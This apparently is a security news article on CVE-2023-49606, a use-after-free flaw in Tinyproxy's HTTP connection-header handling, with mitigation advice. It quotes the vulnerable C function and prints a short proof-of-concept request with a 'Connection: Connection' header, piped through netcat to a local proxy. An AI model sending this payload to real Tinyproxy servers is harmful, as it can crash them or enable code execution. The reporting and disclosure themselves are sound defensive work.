Saturday, November 2, 2024
HomeCVE/vulnerabilityTinyproxy Flaw Let Attackers Execute Remote Code

Tinyproxy Flaw Let Attackers Execute Remote Code

Published on

Malware protection

A security flaw has been identified in Tinyproxy, a lightweight HTTP/HTTPS proxy daemon widely used in small network environments.

The vulnerability, cataloged under CVE-2023-49606, allows remote attackers to execute arbitrary code on the host machine.

This flaw poses a critical risk as it could enable attackers to gain unauthorized access to network resources, potentially leading to further exploitation of internal systems.

- Advertisement - SIEM as a Service

Tinyproxy is designed to be a minimalistic proxy solution, which makes it popular in environments where system resources are limited and a full-featured proxy would be impractical.

Document

Integrate ANY.RUN in Your Company for Effective Malware Analysis

Are you from SOC, Threat Research, or DFIR departments? If so, you can join an online community of 400,000 independent security researchers:

  • Real-time Detection
  • Interactive Malware Analysis
  • Easy to Learn by New Security Team members
  • Get detailed reports with maximum data
  • Set Up Virtual Machine in Linux & all Windows OS Versions
  • Interact with Malware Safely

If you want to test all these features now with completely free access to the sandbox:

Despite its benefits, this vulnerability highlights a severe risk of its deployment, especially in security-sensitive environments.

CVE-2023-49606 – HTTP Connection Headers use-after-free vulnerability

The vulnerability stems from improper memory handling within Tinyproxy’s HTTP request parsing mechanism.

Attackers can exploit this flaw by sending specially crafted HTTP requests to the affected server.

This triggers a buffer overflow or a use-after-free error, leading to arbitrary code execution under the privileges of the Tinyproxy process.

On-Demand Webinar to Secure the Top 3 SME Attack Vectors: Watch for Free.

Tinyproxy does exactly that in the remove_connection_headers() function:

static int remove_connection_headers (orderedmap hashofheaders)
          {
                  static const char *headers[] = {
                          "connection",
                          "proxy-connection"
                  };
                  for (i = 0; i != (sizeof (headers) / sizeof (char *)); ++i) {
                          /* Look for the connection header.  If it's not found, return. */
                          data = orderedmap_find(hashofheaders,headers[i]);                       (1)
                          if (!data)
                                  return 0;                                                         (2)
                                                   ...       
                          ptr = data;                
                          while (ptr < data + len) {
                                  orderedmap_remove (hashofheaders, ptr);                          (3)
                                                                        ...       
                          }
                          /* Now remove the connection header it self. */
                          orderedmap_remove (hashofheaders, headers[i]);                           (4)
                               }
                               return 0;
          }

Exploit Proof of Concept

As mentioned, the PoC for the vulnerability is a very simple HTTP request. One variation is:

GET / HTTP/1.1

 Connection: Connection

 Host: 192.168.86.166:8000

Assuming there is an actual host at 192.168.86.166:8000, one can do:

 cat heap-uaf.poc | nc 127.0.0.1 8888

With the relevant tinyproxy.config being:

Port 8888

 Listen 127.0.0.1

 The issue was first reported by the Cisco Talos Intelligence Group, which regularly scans popular open-source software for security vulnerabilities.

Following the discovery, patches and updates were swiftly released to mitigate the risk.

Users of Tinyproxy are urged to update to the latest version to protect against potential exploits.

Mitigation and Recommendations

For network administrators and users of Tinyproxy, it is crucial to apply the security patches provided by the developers immediately.

Additionally, monitoring network activity for any unusual behavior that might indicate an attempt to exploit this vulnerability is recommended.

Organizations should also consider implementing additional security measures such as intrusion detection systems (IDS) and regular security audits to protect their networks further.

Given the nature of this vulnerability, it is also advisable to restrict the network access to Tinyproxy servers, ensuring that only trusted devices can communicate with the proxy.

While Tinyproxy offers significant advantages for small networks, this incident reminds us of the importance of maintaining up-to-date security practices, even in less resource-intensive applications.

Is Your Network Under Attack? - Read CISO’s Guide to Avoiding the Next Breach - Download Free Guide

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

LightSpy iOS Malware Enhanced with 28 New Destructive Plugins

The LightSpy threat actor exploited publicly available vulnerabilities and jailbreak kits to compromise iOS...

ATPC Cyber Forum to Focus on Next Generation Cybersecurity and Artificial Intelligence Issues

White House National Cyber Director, CEOs, Key Financial Services Companies, Congressional and Executive Branch...

New PySilon RAT Abusing Discord Platform to Maintain Persistence

Cybersecurity experts have identified a new Remote Access Trojan (RAT) named PySilon. This Trojan...

Konni APT Hackers Attacking Organizations with New Spear-Phishing Tactics

The notorious Konni Advanced Persistent Threat (APT) group has intensified its cyber assault on...

Free Webinar

Protect Websites & APIs from Malware Attack

Malware targeting customer-facing websites and API applications poses significant risks, including compliance violations, defacements, and even blacklisting.

Join us for an insightful webinar featuring Vivek Gopalan, VP of Products at Indusface, as he shares effective strategies for safeguarding websites and APIs against malware.

Discussion points

Scan DOM, internal links, and JavaScript libraries for hidden malware.
Detect website defacements in real time.
Protect your brand by monitoring for potential blacklisting.
Prevent malware from infiltrating your server and cloud infrastructure.

More like this

LightSpy iOS Malware Enhanced with 28 New Destructive Plugins

The LightSpy threat actor exploited publicly available vulnerabilities and jailbreak kits to compromise iOS...

New PySilon RAT Abusing Discord Platform to Maintain Persistence

Cybersecurity experts have identified a new Remote Access Trojan (RAT) named PySilon. This Trojan...

Konni APT Hackers Attacking Organizations with New Spear-Phishing Tactics

The notorious Konni Advanced Persistent Threat (APT) group has intensified its cyber assault on...